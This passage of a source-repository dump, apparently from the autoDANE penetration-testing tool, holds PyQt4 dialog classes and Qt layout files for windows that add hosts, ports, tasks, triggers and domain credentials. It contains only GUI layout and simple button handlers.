53 | self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
54 | self.horizontalLayout_2.addWidget(self.btnCancel)
55 | self.verticalLayout.addLayout(self.horizontalLayout_2)
56 |
57 | self.retranslateUi(Dialog)
58 | QtCore.QMetaObject.connectSlotsByName(Dialog)
59 |
60 | def retranslateUi(self, Dialog):
61 | Dialog.setWindowTitle(_translate("Dialog", "New Port", None))
62 | self.label.setText(_translate("Dialog", "Port Number", None))
63 | self.btnOK.setText(_translate("Dialog", "OK", None))
64 | self.btnCancel.setText(_translate("Dialog", "Cancel", None))
65 |
66 |
67 | if __name__ == "__main__":
68 | import sys
69 | app = QtGui.QApplication(sys.argv)
70 | Dialog = QtGui.QDialog()
71 | ui = Ui_Dialog()
72 | ui.setupUi(Dialog)
73 | Dialog.show()
74 | sys.exit(app.exec_())
75 |
76 |
--------------------------------------------------------------------------------
/inputwindows/Ui_confirmation.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/confirmation.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
11 | try:
12 | _fromUtf8 = QtCore.QString.fromUtf8
13 | except AttributeError:
14 | def _fromUtf8(s):
15 | return s
16 |
17 | try:
18 | _encoding = QtGui.QApplication.UnicodeUTF8
19 | def _translate(context, text, disambig):
20 | return QtGui.QApplication.translate(context, text, disambig, _encoding)
21 | except AttributeError:
22 | def _translate(context, text, disambig):
23 | return QtGui.QApplication.translate(context, text, disambig)
24 |
25 | class Ui_Dialog(object):
26 | def setupUi(self, Dialog):
27 | Dialog.setObjectName(_fromUtf8("Dialog"))
28 | Dialog.resize(485, 275)
29 | Dialog.setSizeGripEnabled(True)
30 | Dialog.setModal(True)
31 | self.gridLayout = QtGui.QGridLayout(Dialog)
32 | self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
33 | self.horizontalLayout = QtGui.QHBoxLayout()
34 | self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
35 | self.lblImage = QtGui.QLabel(Dialog)
36 | self.lblImage.setMinimumSize(QtCore.QSize(221, 221))
37 | self.lblImage.setMaximumSize(QtCore.QSize(221, 221))
38 | self.lblImage.setObjectName(_fromUtf8("lblImage"))
39 | self.horizontalLayout.addWidget(self.lblImage)
40 | self.label_2 = QtGui.QLabel(Dialog)
41 | self.label_2.setObjectName(_fromUtf8("label_2"))
42 | self.horizontalLayout.addWidget(self.label_2)
43 | self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 2)
44 | self.btnYes = QtGui.QPushButton(Dialog)
45 | self.btnYes.setObjectName(_fromUtf8("btnYes"))
46 | self.gridLayout.addWidget(self.btnYes, 1, 0, 1, 1)
47 | self.btnNo = QtGui.QPushButton(Dialog)
48 | self.btnNo.setObjectName(_fromUtf8("btnNo"))
49 | self.gridLayout.addWidget(self.btnNo, 1, 1, 1, 1)
50 |
51 | self.retranslateUi(Dialog)
52 | QtCore.QMetaObject.connectSlotsByName(Dialog)
53 |
54 | def retranslateUi(self, Dialog):
55 | Dialog.setWindowTitle(_translate("Dialog", "Confirmation", None))
56 | self.lblImage.setText(_translate("Dialog", "?", None))
57 | self.label_2.setText(_translate("Dialog", "Are you sure?", None))
58 | self.btnYes.setText(_translate("Dialog", "Yes", None))
59 | self.btnNo.setText(_translate("Dialog", "No", None))
60 |
61 |
62 | if __name__ == "__main__":
63 | import sys
64 | app = QtGui.QApplication(sys.argv)
65 | Dialog = QtGui.QDialog()
66 | ui = Ui_Dialog()
67 | ui.setupUi(Dialog)
68 | Dialog.show()
69 | sys.exit(app.exec_())
70 |
71 |
--------------------------------------------------------------------------------
/inputwindows/Ui_newtask.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/newtask.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
11 | try:
12 | _fromUtf8 = QtCore.QString.fromUtf8
13 | except AttributeError:
14 | def _fromUtf8(s):
15 | return s
16 |
17 | try:
18 | _encoding = QtGui.QApplication.UnicodeUTF8
19 | def _translate(context, text, disambig):
20 | return QtGui.QApplication.translate(context, text, disambig, _encoding)
21 | except AttributeError:
22 | def _translate(context, text, disambig):
23 | return QtGui.QApplication.translate(context, text, disambig)
24 |
25 | class Ui_Dialog(object):
26 | def setupUi(self, Dialog):
27 | Dialog.setObjectName(_fromUtf8("Dialog"))
28 | Dialog.resize(414, 389)
29 | Dialog.setSizeGripEnabled(True)
30 | self.verticalLayout_2 = QtGui.QVBoxLayout(Dialog)
31 | self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
32 | self.verticalLayout = QtGui.QVBoxLayout()
33 | self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
34 | self.horizontalLayout = QtGui.QHBoxLayout()
35 | self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
36 | self.label = QtGui.QLabel(Dialog)
37 | self.label.setMinimumSize(QtCore.QSize(110, 0))
38 | self.label.setMaximumSize(QtCore.QSize(110, 16777215))
39 | self.label.setObjectName(_fromUtf8("label"))
40 | self.horizontalLayout.addWidget(self.label)
41 | self.cmbCategory = QtGui.QComboBox(Dialog)
42 | self.cmbCategory.setObjectName(_fromUtf8("cmbCategory"))
43 | self.horizontalLayout.addWidget(self.cmbCategory)
44 | self.verticalLayout.addLayout(self.horizontalLayout)
45 | self.horizontalLayout_2 = QtGui.QHBoxLayout()
46 | self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
47 | self.label_2 = QtGui.QLabel(Dialog)
48 | self.label_2.setMinimumSize(QtCore.QSize(110, 0))
49 | self.label_2.setMaximumSize(QtCore.QSize(110, 16777215))
50 | self.label_2.setObjectName(_fromUtf8("label_2"))
51 | self.horizontalLayout_2.addWidget(self.label_2)
52 | self.txtName = QtGui.QLineEdit(Dialog)
53 | self.txtName.setObjectName(_fromUtf8("txtName"))
54 | self.horizontalLayout_2.addWidget(self.txtName)
55 | self.verticalLayout.addLayout(self.horizontalLayout_2)
56 | self.horizontalLayout_3 = QtGui.QHBoxLayout()
57 | self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
58 | self.label_3 = QtGui.QLabel(Dialog)
59 | self.label_3.setMinimumSize(QtCore.QSize(110, 0))
60 | self.label_3.setMaximumSize(QtCore.QSize(110, 16777215))
61 | self.label_3.setObjectName(_fromUtf8("label_3"))
62 | self.horizontalLayout_3.addWidget(self.label_3)
63 | self.txtDescription = QtGui.QTextEdit(Dialog)
64 | self.txtDescription.setObjectName(_fromUtf8("txtDescription"))
65 | self.horizontalLayout_3.addWidget(self.txtDescription)
66 | self.verticalLayout.addLayout(self.horizontalLayout_3)
67 | self.horizontalLayout_4 = QtGui.QHBoxLayout()
68 | self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
69 | self.label_4 = QtGui.QLabel(Dialog)
70 | self.label_4.setMinimumSize(QtCore.QSize(110, 0))
71 | self.label_4.setMaximumSize(QtCore.QSize(110, 16777215))
72 | self.label_4.setObjectName(_fromUtf8("label_4"))
73 | self.horizontalLayout_4.addWidget(self.label_4)
74 | self.txtFileName = QtGui.QLineEdit(Dialog)
75 | self.txtFileName.setObjectName(_fromUtf8("txtFileName"))
76 | self.horizontalLayout_4.addWidget(self.txtFileName)
77 | self.verticalLayout.addLayout(self.horizontalLayout_4)
78 | self.horizontalLayout_5 = QtGui.QHBoxLayout()
79 | self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
80 | self.label_5 = QtGui.QLabel(Dialog)
81 | self.label_5.setMinimumSize(QtCore.QSize(110, 0))
82 | self.label_5.setMaximumSize(QtCore.QSize(110, 16777215))
83 | self.label_5.setObjectName(_fromUtf8("label_5"))
84 | self.horizontalLayout_5.addWidget(self.label_5)
85 | self.cbxUsesMetasploit = QtGui.QCheckBox(Dialog)
86 | self.cbxUsesMetasploit.setText(_fromUtf8(""))
87 | self.cbxUsesMetasploit.setObjectName(_fromUtf8("cbxUsesMetasploit"))
88 | self.horizontalLayout_5.addWidget(self.cbxUsesMetasploit)
89 | self.verticalLayout.addLayout(self.horizontalLayout_5)
90 | self.horizontalLayout_8 = QtGui.QHBoxLayout()
91 | self.horizontalLayout_8.setObjectName(_fromUtf8("horizontalLayout_8"))
92 | self.label_7 = QtGui.QLabel(Dialog)
93 | self.label_7.setMinimumSize(QtCore.QSize(110, 0))
94 | self.label_7.setMaximumSize(QtCore.QSize(110, 16777215))
95 | self.label_7.setObjectName(_fromUtf8("label_7"))
96 | self.horizontalLayout_8.addWidget(self.label_7)
97 | self.cbxIsRecursive = QtGui.QCheckBox(Dialog)
98 | self.cbxIsRecursive.setText(_fromUtf8(""))
99 | self.cbxIsRecursive.setObjectName(_fromUtf8("cbxIsRecursive"))
100 | self.horizontalLayout_8.addWidget(self.cbxIsRecursive)
101 | self.verticalLayout.addLayout(self.horizontalLayout_8)
102 | self.horizontalLayout_6 = QtGui.QHBoxLayout()
103 | self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
104 | self.label_6 = QtGui.QLabel(Dialog)
105 | self.label_6.setMinimumSize(QtCore.QSize(110, 0))
106 | self.label_6.setMaximumSize(QtCore.QSize(110, 16777215))
107 | self.label_6.setObjectName(_fromUtf8("label_6"))
108 | self.horizontalLayout_6.addWidget(self.label_6)
109 | self.cbxEnabled = QtGui.QCheckBox(Dialog)
110 | self.cbxEnabled.setText(_fromUtf8(""))
111 | self.cbxEnabled.setObjectName(_fromUtf8("cbxEnabled"))
112 | self.horizontalLayout_6.addWidget(self.cbxEnabled)
113 | self.verticalLayout.addLayout(self.horizontalLayout_6)
114 | spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
115 | self.verticalLayout.addItem(spacerItem)
116 | self.verticalLayout_2.addLayout(self.verticalLayout)
117 | self.horizontalLayout_7 = QtGui.QHBoxLayout()
118 | self.horizontalLayout_7.setObjectName(_fromUtf8("horizontalLayout_7"))
119 | self.btnSave = QtGui.QPushButton(Dialog)
120 | self.btnSave.setObjectName(_fromUtf8("btnSave"))
121 | self.horizontalLayout_7.addWidget(self.btnSave)
122 | self.btnCancel = QtGui.QPushButton(Dialog)
123 | self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
124 | self.horizontalLayout_7.addWidget(self.btnCancel)
125 | self.verticalLayout_2.addLayout(self.horizontalLayout_7)
126 |
127 | self.retranslateUi(Dialog)
128 | QtCore.QMetaObject.connectSlotsByName(Dialog)
129 |
130 | def retranslateUi(self, Dialog):
131 | Dialog.setWindowTitle(_translate("Dialog", "New Task", None))
132 | self.label.setText(_translate("Dialog", "Category", None))
133 | self.label_2.setText(_translate("Dialog", "Name", None))
134 | self.label_3.setText(_translate("Dialog", "Description", None))
135 | self.label_4.setText(_translate("Dialog", "File Name", None))
136 | self.label_5.setText(_translate("Dialog", "Uses Metasploit", None))
137 | self.label_7.setText(_translate("Dialog", "Is Recursive", None))
138 | self.label_6.setText(_translate("Dialog", "Enabled", None))
139 | self.btnSave.setText(_translate("Dialog", "Save", None))
140 | self.btnCancel.setText(_translate("Dialog", "Cancel", None))
141 |
142 |
143 | if __name__ == "__main__":
144 | import sys
145 | app = QtGui.QApplication(sys.argv)
146 | Dialog = QtGui.QDialog()
147 | ui = Ui_Dialog()
148 | ui.setupUi(Dialog)
149 | Dialog.show()
150 | sys.exit(app.exec_())
151 |
152 |
--------------------------------------------------------------------------------
/inputwindows/Ui_newtrigger.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/inputwindows/newtrigger.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
11 | try:
12 | _fromUtf8 = QtCore.QString.fromUtf8
13 | except AttributeError:
14 | def _fromUtf8(s):
15 | return s
16 |
17 | try:
18 | _encoding = QtGui.QApplication.UnicodeUTF8
19 | def _translate(context, text, disambig):
20 | return QtGui.QApplication.translate(context, text, disambig, _encoding)
21 | except AttributeError:
22 | def _translate(context, text, disambig):
23 | return QtGui.QApplication.translate(context, text, disambig)
24 |
25 | class Ui_Dialog(object):
26 | def setupUi(self, Dialog):
27 | Dialog.setObjectName(_fromUtf8("Dialog"))
28 | Dialog.resize(385, 260)
29 | Dialog.setSizeGripEnabled(True)
30 | self.gridLayout = QtGui.QGridLayout(Dialog)
31 | self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
32 | self.verticalLayout = QtGui.QVBoxLayout()
33 | self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
34 | self.horizontalLayout = QtGui.QHBoxLayout()
35 | self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
36 | self.label = QtGui.QLabel(Dialog)
37 | self.label.setMinimumSize(QtCore.QSize(110, 0))
38 | self.label.setMaximumSize(QtCore.QSize(110, 16777215))
39 | self.label.setObjectName(_fromUtf8("label"))
40 | self.horizontalLayout.addWidget(self.label)
41 | self.cmbTriggers = QtGui.QComboBox(Dialog)
42 | self.cmbTriggers.setObjectName(_fromUtf8("cmbTriggers"))
43 | self.horizontalLayout.addWidget(self.cmbTriggers)
44 | self.verticalLayout.addLayout(self.horizontalLayout)
45 | self.horizontalLayout_2 = QtGui.QHBoxLayout()
46 | self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
47 | self.label_2 = QtGui.QLabel(Dialog)
48 | self.label_2.setMinimumSize(QtCore.QSize(110, 0))
49 | self.label_2.setMaximumSize(QtCore.QSize(110, 16777215))
50 | self.label_2.setObjectName(_fromUtf8("label_2"))
51 | self.horizontalLayout_2.addWidget(self.label_2)
52 | self.txtValueMask = QtGui.QLineEdit(Dialog)
53 | self.txtValueMask.setObjectName(_fromUtf8("txtValueMask"))
54 | self.horizontalLayout_2.addWidget(self.txtValueMask)
55 | self.verticalLayout.addLayout(self.horizontalLayout_2)
56 | self.horizontalLayout_3 = QtGui.QHBoxLayout()
57 | self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
58 | self.label_3 = QtGui.QLabel(Dialog)
59 | self.label_3.setMinimumSize(QtCore.QSize(110, 0))
60 | self.label_3.setMaximumSize(QtCore.QSize(110, 16777215))
61 | self.label_3.setObjectName(_fromUtf8("label_3"))
62 | self.horizontalLayout_3.addWidget(self.label_3)
63 | self.cmbCategory = QtGui.QComboBox(Dialog)
64 | self.cmbCategory.setObjectName(_fromUtf8("cmbCategory"))
65 | self.horizontalLayout_3.addWidget(self.cmbCategory)
66 | self.verticalLayout.addLayout(self.horizontalLayout_3)
67 | self.horizontalLayout_4 = QtGui.QHBoxLayout()
68 | self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
69 | self.label_4 = QtGui.QLabel(Dialog)
70 | self.label_4.setMinimumSize(QtCore.QSize(110, 0))
71 | self.label_4.setMaximumSize(QtCore.QSize(110, 16777215))
72 | self.label_4.setObjectName(_fromUtf8("label_4"))
73 | self.horizontalLayout_4.addWidget(self.label_4)
74 | self.cmbTasks = QtGui.QComboBox(Dialog)
75 | self.cmbTasks.setObjectName(_fromUtf8("cmbTasks"))
76 | self.horizontalLayout_4.addWidget(self.cmbTasks)
77 | self.verticalLayout.addLayout(self.horizontalLayout_4)
78 | self.horizontalLayout_5 = QtGui.QHBoxLayout()
79 | self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
80 | self.label_5 = QtGui.QLabel(Dialog)
81 | self.label_5.setMinimumSize(QtCore.QSize(110, 0))
82 | self.label_5.setMaximumSize(QtCore.QSize(110, 16777215))
83 | self.label_5.setObjectName(_fromUtf8("label_5"))
84 | self.horizontalLayout_5.addWidget(self.label_5)
85 | self.cbxEnabled = QtGui.QCheckBox(Dialog)
86 | self.cbxEnabled.setText(_fromUtf8(""))
87 | self.cbxEnabled.setChecked(True)
88 | self.cbxEnabled.setObjectName(_fromUtf8("cbxEnabled"))
89 | self.horizontalLayout_5.addWidget(self.cbxEnabled)
90 | self.verticalLayout.addLayout(self.horizontalLayout_5)
91 | spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
92 | self.verticalLayout.addItem(spacerItem)
93 | self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
94 | self.horizontalLayout_6 = QtGui.QHBoxLayout()
95 | self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
96 | self.btnSave = QtGui.QPushButton(Dialog)
97 | self.btnSave.setObjectName(_fromUtf8("btnSave"))
98 | self.horizontalLayout_6.addWidget(self.btnSave)
99 | self.btnCancel = QtGui.QPushButton(Dialog)
100 | self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
101 | self.horizontalLayout_6.addWidget(self.btnCancel)
102 | self.gridLayout.addLayout(self.horizontalLayout_6, 1, 0, 1, 1)
103 |
104 | self.retranslateUi(Dialog)
105 | QtCore.QMetaObject.connectSlotsByName(Dialog)
106 |
107 | def retranslateUi(self, Dialog):
108 | Dialog.setWindowTitle(_translate("Dialog", "New Event", None))
109 | self.label.setText(_translate("Dialog", "Trigger", None))
110 | self.label_2.setText(_translate("Dialog", "Value Mask", None))
111 | self.label_3.setText(_translate("Dialog", "Task Category", None))
112 | self.label_4.setText(_translate("Dialog", "Task Name", None))
113 | self.label_5.setText(_translate("Dialog", "Enabled", None))
114 | self.btnSave.setText(_translate("Dialog", "Save", None))
115 | self.btnCancel.setText(_translate("Dialog", "Cancel", None))
116 |
117 |
118 | if __name__ == "__main__":
119 | import sys
120 | app = QtGui.QApplication(sys.argv)
121 | Dialog = QtGui.QDialog()
122 | ui = Ui_Dialog()
123 | ui.setupUi(Dialog)
124 | Dialog.show()
125 | sys.exit(app.exec_())
126 |
127 |
--------------------------------------------------------------------------------
/inputwindows/Ui_textinput.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/root/Projects/autoDANE/inputwindows/textinput.ui'
4 | #
5 | # Created: Mon Jan 18 21:41:42 2016
6 | # by: PyQt4 UI code generator 4.11.2
7 | #
8 | # WARNING! All changes made in this file will be lost!
9 |
10 | from PyQt4 import QtCore, QtGui
11 |
12 | try:
13 | _fromUtf8 = QtCore.QString.fromUtf8
14 | except AttributeError:
15 | def _fromUtf8(s):
16 | return s
17 |
18 | try:
19 | _encoding = QtGui.QApplication.UnicodeUTF8
20 | def _translate(context, text, disambig):
21 | return QtGui.QApplication.translate(context, text, disambig, _encoding)
22 | except AttributeError:
23 | def _translate(context, text, disambig):
24 | return QtGui.QApplication.translate(context, text, disambig)
25 |
26 | class Ui_Dialog(object):
27 | def setupUi(self, Dialog):
28 | Dialog.setObjectName(_fromUtf8("Dialog"))
29 | Dialog.resize(423, 172)
30 | Dialog.setSizeGripEnabled(True)
31 | self.gridLayout = QtGui.QGridLayout(Dialog)
32 | self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
33 | self.verticalLayout_2 = QtGui.QVBoxLayout()
34 | self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
35 | self.horizontalLayout_2 = QtGui.QHBoxLayout()
36 | self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
37 | self.label = QtGui.QLabel(Dialog)
38 | self.label.setMinimumSize(QtCore.QSize(75, 0))
39 | self.label.setObjectName(_fromUtf8("label"))
40 | self.horizontalLayout_2.addWidget(self.label)
41 | self.txtDomain = QtGui.QLineEdit(Dialog)
42 | self.txtDomain.setObjectName(_fromUtf8("txtDomain"))
43 | self.horizontalLayout_2.addWidget(self.txtDomain)
44 | self.verticalLayout_2.addLayout(self.horizontalLayout_2)
45 | self.horizontalLayout_3 = QtGui.QHBoxLayout()
46 | self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
47 | self.label_2 = QtGui.QLabel(Dialog)
48 | self.label_2.setMinimumSize(QtCore.QSize(75, 0))
49 | self.label_2.setObjectName(_fromUtf8("label_2"))
50 | self.horizontalLayout_3.addWidget(self.label_2)
51 | self.txtLootFileName = QtGui.QLineEdit(Dialog)
52 | self.txtLootFileName.setObjectName(_fromUtf8("txtLootFileName"))
53 | self.horizontalLayout_3.addWidget(self.txtLootFileName)
54 | self.verticalLayout_2.addLayout(self.horizontalLayout_3)
55 | spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
56 | self.verticalLayout_2.addItem(spacerItem)
57 | self.horizontalLayout = QtGui.QHBoxLayout()
58 | self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
59 | spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
60 | self.horizontalLayout.addItem(spacerItem1)
61 | self.btnOk = QtGui.QPushButton(Dialog)
62 | self.btnOk.setObjectName(_fromUtf8("btnOk"))
63 | self.horizontalLayout.addWidget(self.btnOk)
64 | self.btnCancel = QtGui.QPushButton(Dialog)
65 | self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
66 | self.horizontalLayout.addWidget(self.btnCancel)
67 | self.verticalLayout_2.addLayout(self.horizontalLayout)
68 | self.gridLayout.addLayout(self.verticalLayout_2, 0, 0, 1, 1)
69 |
70 | self.retranslateUi(Dialog)
71 | QtCore.QMetaObject.connectSlotsByName(Dialog)
72 |
73 | def retranslateUi(self, Dialog):
74 | Dialog.setWindowTitle(_translate("Dialog", "Dialog", None))
75 | self.label.setText(_translate("Dialog", "Domain", None))
76 | self.label_2.setText(_translate("Dialog", "Loot File", None))
77 | self.btnOk.setText(_translate("Dialog", "OK", None))
78 | self.btnCancel.setText(_translate("Dialog", "Cancel", None))
79 |
80 |
81 | if __name__ == "__main__":
82 | import sys
83 | app = QtGui.QApplication(sys.argv)
84 | Dialog = QtGui.QDialog()
85 | ui = Ui_Dialog()
86 | ui.setupUi(Dialog)
87 | Dialog.show()
88 | sys.exit(app.exec_())
89 |
90 |
--------------------------------------------------------------------------------
/inputwindows/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/inputwindows/__init__.py
--------------------------------------------------------------------------------
/inputwindows/adddomaincreds.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_adddomaincreds import Ui_Dialog
5 |
6 | class wndAddDomainCreds(QDialog, Ui_Dialog):
7 | def __init__(self, parent=None):
8 | QDialog.__init__(self, parent)
9 | self.setupUi(self)
10 |
11 | @pyqtSignature("")
12 | def on_btnOK_clicked(self):
13 | if self.txtDomain.text() != "" and self.txtUsername.text():
14 | self.accept()
15 | else:
16 | QMessageBox.information(self, "Information", "You need to provide at least a domain and username")
17 |
18 | @pyqtSignature("")
19 | def on_btnCancel_clicked(self):
20 | self.reject()
21 |
--------------------------------------------------------------------------------
/inputwindows/adddomaincreds.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 668
10 | 398
11 |
12 |
13 |
14 | Add Domain Creds
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 |
28 | 100
29 | 0
30 |
31 |
32 |
33 | Domain
34 |
35 |
36 |
37 | -
38 |
39 |
40 |
41 |
42 | -
43 |
44 |
-
45 |
46 |
47 |
48 | 100
49 | 0
50 |
51 |
52 |
53 | Username
54 |
55 |
56 |
57 | -
58 |
59 |
60 |
61 |
62 | -
63 |
64 |
-
65 |
66 |
67 |
68 | 100
69 | 0
70 |
71 |
72 |
73 | Password
74 |
75 |
76 |
77 | -
78 |
79 |
80 |
81 |
82 | -
83 |
84 |
-
85 |
86 |
87 |
88 | 100
89 | 0
90 |
91 |
92 |
93 | LM Hash
94 |
95 |
96 |
97 | -
98 |
99 |
100 |
101 |
102 | -
103 |
104 |
-
105 |
106 |
107 |
108 | 100
109 | 0
110 |
111 |
112 |
113 | NTLM Hash
114 |
115 |
116 |
117 | -
118 |
119 |
120 |
121 |
122 | -
123 |
124 |
125 | Verified. Check this if you're sure the password is correct
126 |
127 |
128 | false
129 |
130 |
131 |
132 | -
133 |
134 |
135 | Qt::Vertical
136 |
137 |
138 |
139 | 20
140 | 40
141 |
142 |
143 |
144 |
145 | -
146 |
147 |
-
148 |
149 |
150 | Qt::Horizontal
151 |
152 |
153 |
154 | 40
155 | 20
156 |
157 |
158 |
159 |
160 | -
161 |
162 |
163 | OK
164 |
165 |
166 |
167 | -
168 |
169 |
170 | Cancel
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
--------------------------------------------------------------------------------
/inputwindows/addhost.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog, QMessageBox
3 |
4 | from .Ui_addhost import Ui_Dialog
5 |
6 | class wndAddHost(QDialog, Ui_Dialog):
7 | def __init__(self, parent=None):
8 | QDialog.__init__(self, parent)
9 | self.setupUi(self)
10 |
11 | def valid(self):
12 | res = False
13 | try:
14 | octs = str(self.txtIPAddress.text()).split(".")
15 | if 4 == len(octs):
16 | if int(octs[0]) + int(octs[1]) + int(octs[2]) + int(octs[3]) < (255 * 4):
17 | res = True
18 | except:
19 | res = False
20 |
21 | return res
22 |
23 | @pyqtSignature("")
24 | def on_btnOK_clicked(self):
25 | if self.valid() == True:
26 | self.accept()
27 | else:
28 | QMessageBox.information(self, "Information", "That's not a valid IP")
29 |
30 | @pyqtSignature("")
31 | def on_btnCancel_clicked(self):
32 | self.reject()
33 |
--------------------------------------------------------------------------------
/inputwindows/addhost.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 465
10 | 151
11 |
12 |
13 |
14 | Add Host
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 | IP Address
28 |
29 |
30 |
31 | -
32 |
33 |
34 |
35 |
36 | -
37 |
38 |
39 | Qt::Vertical
40 |
41 |
42 |
43 | 20
44 | 40
45 |
46 |
47 |
48 |
49 | -
50 |
51 |
-
52 |
53 |
54 | Qt::Horizontal
55 |
56 |
57 |
58 | 40
59 | 20
60 |
61 |
62 |
63 |
64 | -
65 |
66 |
67 | OK
68 |
69 |
70 |
71 | -
72 |
73 |
74 | Cancel
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
--------------------------------------------------------------------------------
/inputwindows/addport.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from PyQt4.QtCore import pyqtSignature
4 | from PyQt4.QtGui import QDialog
5 |
6 | from .Ui_addport import Ui_Dialog
7 |
8 |
9 | class AddPort(QDialog, Ui_Dialog):
10 | def __init__(self, parent=None):
11 | QDialog.__init__(self, parent)
12 | self.setupUi(self)
13 |
14 | @pyqtSignature("")
15 | def on_btnOK_clicked(self):
16 | self.accept()
17 |
18 | @pyqtSignature("")
19 | def on_btnCancel_clicked(self):
20 | self.reject()
21 |
--------------------------------------------------------------------------------
/inputwindows/addport.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 478
10 | 164
11 |
12 |
13 |
14 | New Port
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
25 |
26 | 100
27 | 16777215
28 |
29 |
30 |
31 | Port Number
32 |
33 |
34 |
35 | -
36 |
37 |
38 | 65535
39 |
40 |
41 |
42 |
43 |
44 | -
45 |
46 |
47 | Qt::Vertical
48 |
49 |
50 |
51 | 20
52 | 73
53 |
54 |
55 |
56 |
57 | -
58 |
59 |
-
60 |
61 |
62 | Qt::Horizontal
63 |
64 |
65 |
66 | 40
67 | 20
68 |
69 |
70 |
71 |
72 | -
73 |
74 |
75 | OK
76 |
77 |
78 |
79 | -
80 |
81 |
82 | Cancel
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
--------------------------------------------------------------------------------
/inputwindows/confirmation.py:
--------------------------------------------------------------------------------
1 | from PyQt4.QtCore import pyqtSignature
2 | from PyQt4.QtGui import QDialog
3 | from PyQt4 import QtGui, QtCore
4 | from PyQt4.QtCore import QString
5 |
6 | from .Ui_confirmation import Ui_Dialog
7 |
8 |
9 | class wndConfirmation(QDialog, Ui_Dialog):
10 | def __init__(self, parent=None):
11 | QDialog.__init__(self, parent)
12 | self.setupUi(self)
13 |
14 | logoPixmap = QtGui.QPixmap(QString.fromUtf8('images/confirm.png'))
15 | logoScaledPixmap = logoPixmap.scaled(self.lblImage.size(), QtCore.Qt.KeepAspectRatio)
16 | self.lblImage.setPixmap(logoScaledPixmap)
17 |
18 | @pyqtSignature("")
19 | def on_btnYes_clicked(self):
20 | self.accept()
21 |
22 | @pyqtSignature("")
23 | def on_btnNo_clicked(self):
24 | self.reject()
25 |
--------------------------------------------------------------------------------
/inputwindows/confirmation.ui:
